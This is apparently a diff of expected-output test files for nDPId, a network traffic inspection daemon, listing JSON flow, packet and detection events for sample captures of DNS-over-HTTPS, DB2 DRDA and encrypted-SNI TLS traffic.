00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":577,"packets-processed":577,"total-skipped-flows":0,"total-l4-data-len":185420,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":36,"total-updates":0,"current-active-flows":0,"total-active-flows":34,"total-idle-flows":34,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":243,"global_ts_msec":946739888204}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 577/577

12
test/results/drda_db2.pcap.out
View File

@@ -1,11 +1,11 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"drda_db2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1175543772220}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1175543772220,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1175543772220,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1175543772220,"flow_last_seen":1175543772220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1175543772220,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}}
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":4623,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1175543810683}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 38/38

24
test/results/encrypted_sni.pcap.out
View File

@@ -1,17 +1,17 @@
00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"encrypted_sni.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="}
00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
